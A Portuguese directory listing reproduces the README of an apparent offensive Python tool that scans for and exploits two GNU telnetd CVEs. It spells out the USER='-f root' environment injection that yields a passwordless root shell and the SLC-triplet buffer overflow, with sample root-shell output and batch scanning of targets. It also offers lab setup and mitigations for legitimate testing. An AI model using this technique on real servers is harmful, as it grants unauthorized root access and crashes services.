Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
telnet_scan — scanner/explorador CVE-2026-24061 e CVE-2026-32746 | Kitploit
Ferramentas/GitHubGitHub/ekomssavior/telnet_scan
Scanners de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoAutenticaçãoAprendizado e EducaçãoExploração de BináriosLabs e Prática
GitHubekomssavior/telnet_scan

telnet_scan

scanner/explorador CVE-2026-24061 e CVE-2026-32746

Ver Repositório
1161há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Scanner de Vulnerabilidades Telnet (CVE-2026-24061 & CVE-2026-32746)

License:ek0ms

Uma ferramenta de avaliação de segurança baseada em Python que detecta e (quando aplicável) explora duas vulnerabilidades críticas no telnetd do GNU InetUtils:

  • CVE-2026-24061 – Bypass de autenticação via injeção da variável de ambiente USER (CVSS 9.8)
  • CVE-2026-32746 – Estouro de buffer pré-autenticação no manipulador LINEMODE SLC (CVSS 9.8)

Aviso Importante

Esta ferramenta destina-se apenas a testes de segurança autorizados e fins educacionais.
O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal. Os autores não se responsabilizam pelo uso indevido ou danos causados por esta ferramenta. Use por sua conta e risco.

image1(1)

Funcionalidades

  • Varredura de alvo único – Insira endereços IP ou nomes de domínio em tempo de execução
  • Varredura em lote – Carregue um arquivo contendo vários alvos (um por linha)
  • Teste seletivo – Teste cada vulnerabilidade individualmente ou ambas
  • – Se vulnerável, a ferramenta o coloca em um shell interativo root diretamente no mesmo terminal
Baixar ferramenta
Exploração CVE-2026-24061
  • Detecção CVE-2026-32746 – Identifica sistemas vulneráveis através de detecção controlada de crash
  • Manipulação limpa do terminal – Shell em modo raw com restauração adequada ao sair
  • Validação de conexão – Distingue entre portas filtradas, serviços offline e vulnerabilidades reais
  • Depuração detalhada – Defina TELNET_SCAN_VERBOSE=1 para ver cada pacote IAC e a narrativa passo a passo do exploit
  • Ambiente de laboratório Docker – Alvo vulnerável autocontido para testes seguros
  • Instalação

    root@kitploit:~
    git clone https://github.com/ekomsSavior/telnet_scan.git
    cd telnet_scan
    chmod +x telnet_scanner.py
    

    Uso

    Execução Básica

    root@kitploit:~
    python3 telnet_scanner.py
    

    Laboratório Docker (Teste Seguro)

    Teste o exploit contra um alvo vulnerável conhecido sem arriscar sistemas reais:

    root@kitploit:~
    cd lab
    docker compose up -d
    cd ..
    python3 telnet_scanner.py
    # Alvo: 127.0.0.1, Porta: 2323
    

    O laboratório executa um telnetd do GNU InetUtils 2.5 vulnerável em um contêiner isolado, vinculado apenas ao localhost. Sem exposição à rede.

    Modo Detalhado

    Depure o handshake telnet e veja exatamente o que está acontecendo no fio:

    root@kitploit:~
    TELNET_SCAN_VERBOSE=1 python3 telnet_scanner.py
    

    A saída detalhada mostra:

    • Cada comando IAC (DO/WILL/SB) enviado e recebido
    • Nomes de opções telnet decodificados
    • Dumps hexadecimais de payload para subnegociações
    • Fluxo do exploit passo a passo (handshake de 6 etapas)

    IMG_2498

    Fluxo de Alvo Único

    1. Escolha a opção 1
    2. Digite o alvo (IP ou domínio, ex.: 192.168.1.100 ou example.com)
    3. Especifique a porta (padrão é 23 se deixado em branco)
    4. Selecione o tipo de teste:
      • 1 – Ambas as vulnerabilidades
      • 2 – Apenas CVE-2026-24061 (bypass de autenticação)
      • 3 – Apenas CVE-2026-32746 (estouro de buffer)

    Fluxo de Varredura em Lote

    1. Crie um arquivo com os alvos (um por linha) Exemplo targets.txt:
      root@kitploit:~
      192.168.1.100
      192.168.1.101
      10.0.0.50
      example.com
      # Esta é uma linha de comentário - ignorada
      
    2. Escolha a opção 2
    3. Digite o nome do arquivo
    4. Especifique a porta (padrão é 23)
    5. Selecione o tipo de teste (1, 2 ou 3)
    6. O scanner irá:
      • Mostrar o progresso para cada alvo
      • Exibir os resultados à medida que são concluídos
      • Fornecer uma tabela resumida ao final

    Quando um Shell é Obtido

    Se o CVE-2026-24061 for bem-sucedido:

    1. A vulnerabilidade é detectada
    2. Um shell interativo root aparece diretamente na mesma janela do terminal
    3. Digite comandos e veja a saída imediatamente (ex.: id, whoami, ls)
    4. Pressione Ctrl+C para sair do shell e retornar ao menu do scanner
    5. Para varreduras em lote, você será perguntado se deseja interagir com o shell ou continuar a varredura

    Nenhum terminal separado ou etapas extras são necessários.

    Como Funciona

    CVE-2026-24061 – Bypass de Autenticação

    O exploit segue um handshake telnet preciso de 6 etapas para garantir compatibilidade com o telnetd real do GNU InetUtils:

    1. Aguardar negociação do servidor – Até 15 segundos para DNS reverso e opções DO iniciais
    2. Responder WILL – Reconhecer TTYPE, TSPEED, XDISPLOC, NEW_ENVIRON
    3. Aguardar SB SEND – Solicitações de subnegociação do servidor
    4. Enviar payload do exploit – Definir USER="-f root" via subnegociação NEW_ENVIRON
    5. Lidar com as trocas restantes – Responder a DO/WILL para SGA, ECHO, LINEMODE, NAWS
    6. Detectar shell – Procurar por prompt # , root@ ou $

    Uma thread de keepalive envia IAC NOP a cada 2 segundos para evitar que o ttloop() do telnetd detecte EOF e chame exit(1) antes que o payload seja processado.

    O telnetd vulnerável passa -f root para /usr/bin/login, ignorando a autenticação e concedendo acesso imediato ao shell root.

    CVE-2026-32746 – Detecção de Estouro de Buffer

    • Negocia a opção LINEMODE (RFC 1184)
    • Envia 500+ tripletos SLC (1500+ bytes) para estourar o buffer de tamanho fixo
    • Monitora reinicializações/quedas de conexão para confirmar a vulnerabilidade

    Validação de Conexão

    • Pré-varredura para verificar a disponibilidade do serviço antes de tentar exploits
    • Distingue entre:
      • Portas filtradas (firewall bloqueando)
      • Serviços offline (nenhum serviço em execução)
      • Serviços vulneráveis (exploit bem-sucedido)

    Exemplo de Saída

    Alvo Único

    root@kitploit:~
    === Scanner de Vulnerabilidades Telnet ===
    1. Escanear um único alvo
    2. Escanear alvos de um arquivo (um IP/hostname por linha)
    3. Sair
    
    Escolha uma opção: 1
    Porta (padrão 23): 
    
    Quais testes executar?
    1. Ambos
    2. Apenas CVE-2026-24061 (bypass de auth - fornece shell se vulnerável)
    3. Apenas CVE-2026-32746 (detecção de estouro de buffer)
    Escolha [1-3]: 1
    Alvo (IP ou domínio): 192.168.1.100
    
    [*] Resolvido 192.168.1.100 -> 192.168.1.100
    [*] Escaneando 192.168.1.100:23...
    
    [*] Verificando se o serviço está acessível...
    [+] Serviço acessível
    
    [*] Testando CVE-2026-24061 (bypass de autenticação)...
    [!] CVE-2026-24061: VULNERÁVEL – shell obtido!
    
    ============================================================
    [+] SHELL ROOT OBTIDO! Você está agora em um shell interativo root.
    [+] Digite comandos diretamente aqui. Pressione Ctrl+C para sair do shell.
    ============================================================
    
    id
    uid=0(root) gid=0(root) groups=0(root)
    

    Saída do Modo Detalhado (Parcial)

    root@kitploit:~
        [PASSO 1/6] Aguardando negociação do servidor (pode levar até 15s)...
        [PASSO 1/6] Obtidos 48 bytes: fffb18fffb20fffb23fffb27...
               decodificado: IAC DO TERMINAL-TYPE
               decodificado: IAC DO TERMINAL-SPEED  
               decodificado: IAC DO X-DISPLAY-LOCATION
               decodificado: IAC DO NEW-ENVIRON
        [PASSO 2/6] Respondendo WILL a todas as opções DO
        [PASSO 3/6] Aguardando solicitações de subnegociação SB SEND...
        [PASSO 4/6] Enviando respostas de subnegociação...
                   NEW-ENVIRON IS VAR USER VALUE "-f root"  *** EXPLOIT ***
        [PASSO 5/6] Lidando com as negociações de opções restantes...
        [PASSO 5/6] Texto recebido: 'root@vuln-lab:~# '
        [RESULTADO] SUCESSO: Login root sem senha via injeção USER="-f root"
    

    Varredura em Lote

    root@kitploit:~
    === Scanner de Vulnerabilidades Telnet ===
    1. Escanear um único alvo
    2. Escanear alvos de um arquivo (um IP/hostname por linha)
    3. Sair
    
    Escolha uma opção: 2
    Porta (padrão 23): 
    Digite o nome do arquivo com os alvos (um por linha): targets.txt
    
    Quais testes executar?
    1. Ambos
    2. Apenas CVE-2026-24061 (bypass de auth - fornece shell se vulnerável)
    3. Apenas CVE-2026-32746 (detecção de estouro de buffer)
    Escolha [1-3]: 1
    
    [*] Carregados 3 alvos de targets.txt
    
    ==================================================
    [1/3] Escaneando 192.168.1.100:23
    ==================================================
    [*] Resolvido 192.168.1.100 -> 192.168.1.100
    [+] Serviço acessível
    
    [*] Testando CVE-2026-24061...
    [!] CVE-2026-24061: VULNERÁVEL – shell obtido!
    
    [?] Shell obtido! Interagir agora? (s/N): n
    
    [*] Testando CVE-2026-32746...
    [+] Servidor não caiu; provavelmente não vulnerável
    
    ==================================================
    [2/3] Escaneando 192.168.1.101:23
    ==================================================
    [-] Serviço não acessível em 192.168.1.101:23
    
    ==================================================
    [3/3] Escaneando example.com:23
    ==================================================
    [*] Resolvido example.com -> 93.184.216.34
    [+] Serviço acessível
    
    [*] Testando CVE-2026-24061...
    [+] Nenhuma resposta recebida; pode ainda estar vulnerável
    
    [*] Testando CVE-2026-32746...
    [!] CVE-2026-32746: VULNERÁVEL (servidor caiu)
    
    ============================================================
    RESUMO DA VARREDURA
    ============================================================
    192.168.1.100: VULNERÁVEL ao CVE-2026-24061
    192.168.1.101: Serviço inacessível
    example.com: VULNERÁVEL ao CVE-2026-32746
    ============================================================
    

    Mitigação

    Se você descobrir sistemas vulneráveis, aplique estas correções:

    1. Atualize o GNU InetUtils para a versão 2.8 ou superior
    2. Desabilite o telnetd e bloqueie a porta TCP/23 nos limites da rede
    3. Restrinja o acesso apenas a redes confiáveis
    4. Monitore logs em busca de conexões com valores NEW_ENVIRON USER começando com -f

    Desenvolvimento e Testes

    Laboratório Docker

    O diretório lab/ incluído fornece um ambiente de teste seguro e reproduzível:

    root@kitploit:~
    cd lab
    docker compose up -d
    # Aguarde ~10 segundos para o telnetd inicializar
    python3 ../telnet_scanner.py
    # Alvo: 127.0.0.1, Porta: 2323
    

    Recursos do laboratório:

    • GNU InetUtils 2.5 compilado a partir do código-fonte (versões vulneráveis)
    • Executa telnetd dentro de um contêiner isolado
    • Vinculado apenas ao localhost:2323 – seguro para desenvolvimento
    • Inclui um usuário de teste (labuser:labpass123) para depuração

    Pare o laboratório quando terminar:

    root@kitploit:~
    cd lab && docker compose down
    

    Limitações Conhecidas

    • O teste de estouro (CVE-2026-32746) pode derrubar o serviço telnetd alvo
    • As teclas de seta e redimensionamento do terminal não são totalmente suportadas no shell interativo
    • Alguns firewalls ou configurações de rede podem interferir na negociação de opções Telnet
    • Usuários Windows: o shell interativo requer um terminal do tipo Unix (WSL, Cygwin ou Linux/macOS)

    image0(2)

    Agradecimentos

    Agradecimentos especiais a @leetcrypt – O handshake adequado de 6 etapas, thread de keepalive, modo detalhado e laboratório Docker estão matando!


    AVISO: apenas para testes de segurança autorizados e fins educacionais.